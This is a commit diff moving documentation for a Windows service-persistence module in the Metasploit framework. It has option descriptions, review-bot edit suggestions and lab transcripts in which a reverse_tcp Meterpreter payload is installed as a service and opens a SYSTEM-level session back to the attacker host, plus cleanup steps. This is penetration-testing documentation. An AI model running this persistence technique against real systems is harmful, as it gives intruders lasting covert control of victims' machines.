Move doc as the module does.

GSoC/Meterpreter_Web_Console
Green-m 2018-10-22 18:10:39 +08:00
parent 4711d6ba08
commit 8a89e8c00c
No known key found for this signature in database
GPG Key ID: 7A4A0E684B5D6747
2 changed files with 130 additions and 113 deletions

View File

@ -0,0 +1,130 @@
## Overview
This Module will generate and upload an executable to a remote host, next will make it a persistent service.
It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required.
## Module Options
**REMOTE_EXE_NAME**
The remote victim name. Random string as default.
**REMOTE_EXE_PATH**
The remote victim exe path to run. Use temp directory as default.
**RETRY_TIME**
The retry time that shell connect failed. 5 seconds as default.
**SERVICE_DESCRIPTION**
The description of service. Random string as default.
**SERVICE_NAME**
The name of service. Random string as default.
## Verification steps
1. get session on target
2. `use exploit/windows/local/persistence_service`
3. `set payload <payload>`
4. `set lport <lport>`
5. `set lhost <lhost>`
6. `exploit`
## Usage
### Windows 7 sp1 x64
```
msf5 exploit(windows/local/persistence_service) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: test-PC\test
meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/local/persistence_service) >
msf5 exploit(windows/local/persistence_service) > use exploit/windows/local/persistence_service
msf5 exploit(windows/local/persistence_service) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/persistence_service) > set lport 2333
lport => 2333
msf5 exploit(windows/local/persistence_service) > set lhost 192.168.56.1
msf5 exploit(windows/local/persistence_service) > options
Module options (exploit/windows/local/persistence_service):
Name Current Setting Required Description
---- --------------- -------- -----------
REMOTE_EXE_NAME no The remote victim name. Random string as default.
REMOTE_EXE_PATH no The remote victim exe path to run. Use temp directory as default.
RETRY_TIME 5 no The retry time that shell connect failed. 5 seconds as default.
SERVICE_DESCRIPTION no The description of service. Random string as default.
SERVICE_NAME no The name of service. Random string as default.
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.56.1 yes The listen address (an interface may be specified)
LPORT 2333 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
msf5 exploit(windows/local/persistence_service) > exploit
[*] Started reverse TCP handler on 192.168.56.1:2333
[*] Running module against TEST-PC
[+] Meterpreter service exe written to C:\Users\test\AppData\Local\Temp\NVNvCyn.exe
[*] Creating service NePaGwA
[*] Cleanup Meterpreter RC File: /Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc
[*] Sending stage (179779 bytes) to 192.168.56.101
[*] Meterpreter session 4 opened (192.168.56.1:2333 -> 192.168.56.101:52781) at 2018-10-22 17:56:21 +0800
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 4...
```
**Clean it**
```
msf5 exploit(windows/local/persistence_service) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > resource /Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc
[*] Processing /Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc for ERB directives.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> execute -H -f sc.exe -a "stop NePaGwA"
Process 6516 created.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> execute -H -f sc.exe -a "delete NePaGwA"
Process 6624 created.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> execute -H -i -f taskkill.exe -a "/f /im NVNvCyn.exe"
Process 5636 created.
Channel 23 created.
SUCCESS: The process "NVNvCyn.exe" with PID 5180 has been terminated.
SUCCESS: The process "NVNvCyn.exe" with PID 4828 has been terminated.
SUCCESS: The process "NVNvCyn.exe" with PID 5728 has been terminated.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181022.5605/TEST-PC_20181022.5605.rc)> rm C:\\Users\\test\\AppData\\Local\\Temp\\NVNvCyn.exe
meterpreter >
```
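Review bot: the Module Options descriptions in this new file do not say what the options actually control, and they carry over the grammar of the deleted file. REMOTE_EXE_NAME is described as "The remote victim name. Random string as default.", but from the Usage output it is the file name of the service executable written to the target (`C:\Users\test\AppData\Local\Temp\NVNvCyn.exe`); suggest "File name of the service executable written to the target. Random string by default." Likewise "The retry time that shell connect failed. 5 seconds as default." for RETRY_TIME should name what it is an interval of, e.g. "Seconds the service waits before retrying after a failed connection. Default: 5", and the Overview's "start the payload whenever the service is running" reads more clearly as "start the payload whenever the service starts". Two smaller points in the transcript: the `set lhost 192.168.56.1` line is not followed by its `lhost => 192.168.56.1` echo before `options`, and the Overview says admin or SYSTEM privilege is required while the pre-exploit `getuid` shows only `test-PC\test`; a sentence noting that the session used here is already elevated (or a `getprivs` in the transcript) would stop readers from expecting this to work from an unprivileged session.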

View File

@ -1,113 +0,0 @@
## Overview
This Module will generate and upload an executable to a remote host, next will make it a persistent service.
It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required.
## Module Options
**LHOST**
IP of host that will receive the connection from the payload.
**LPORT**
Port for Payload to connect to. Default: `4433`
**OPTIONS**
Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
For example: 'AutoLoadStdapi=false,StagerRetryCount=20'
**PAYLOAD**
The payload to use in the service. Default: `windows/meterpreter/reverse_tcp`
**HANDLER**
Start an exploit/multi/handler to receive the connection.
## Verification steps
1. get session on target
2. `use post/windows/manage/persistence_service`
3. `set payload <payload>`
4. `set lport <lport>`
5. `set lhost <lhost>`
6. `set handler true`
7. `run`
## Usage
### Windows 7 sp1 x64
```
msf5 post(windows/manage/persistence_service) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: test-PC\test
meterpreter > sysinfo
Computer : TEST-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf5 post(windows/manage/persistence_service) > options
Module options (post/windows/manage/persistence_service):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true no Start an exploit/multi/handler to receive the connection
LHOST 192.168.56.1 yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
OPTIONS no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/meterpreter/reverse_tcp no The payload to use in the service.
SESSION 1 yes The session to run this module on.
msf5 post(windows/manage/persistence_service) > run
[*] Running module against TEST-PC
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.56.1:4433
[+] Meterpreter service exe written to C:\Users\test\AppData\Local\Temp\IDJkb.exe
[*] Creating service pWbPkeDm
[*] Cleanup Meterpreter RC File: /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc
[*] Post module execution completed
[*] Sending stage (179779 bytes) to 192.168.56.101
msf5 post(windows/manage/persistence_service) > [*] Meterpreter session 3 opened (192.168.56.1:4433 -> 192.168.56.101:50101) at 2018-10-17 18:37:51 +0800
msf5 post(windows/manage/persistence_service) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows test-PC\test @ TEST-PC 192.168.56.1:8888 -> 192.168.56.101:50098 (192.168.56.101)
3 meterpreter x86/windows NT AUTHORITY\SYSTEM @ TEST-PC 192.168.56.1:4433 -> 192.168.56.101:50101 (192.168.56.101)
msf5 post(windows/manage/persistence_service) >
```
**Clean it**
```
msf5 post(windows/manage/persistence_service) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > resource /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc
[*] Processing /Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc for ERB directives.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc)> execute -H -f sc.exe -a "stop pWbPkeDm"
Process 9652 created.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc)> execute -H -f sc.exe -a "delete pWbPkeDm"
Process 9816 created.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc)> execute -H -i -f taskkill.exe -a "/f /im IDJkb.exe"
Process 9688 created.
Channel 13 created.
SUCCESS: The process "IDJkb.exe" with PID 8956 has been terminated.
SUCCESS: The process "IDJkb.exe" with PID 8280 has been terminated.
SUCCESS: The process "IDJkb.exe" with PID 4332 has been terminated.
resource (/Users/green/.msf4/logs/persistence/TEST-PC_20181017.3740/TEST-PC_20181017.3740.rc)> rm C:\\Users\\test\\AppData\\Local\\Temp\\IDJkb.exe
```
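Review bot: removing this file matches the module's move from `post/windows/manage/persistence_service` to `exploit/windows/local/persistence_service`, but two parts of the old text have no counterpart in the replacement doc. The OPTIONS section ("Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format. For example: 'AutoLoadStdapi=false,StagerRetryCount=20'") told users how to pass extra payload settings, and the HANDLER option ("Start an exploit/multi/handler to receive the connection.") told them a listener had to be requested explicitly. In the exploit module those settings become ordinary payload options and the handler is started by the exploit itself, as the new transcript's "Started reverse TCP handler on 192.168.56.1:2333" shows; one sentence in the new doc saying so would save users of the old post module from looking for options that no longer exist.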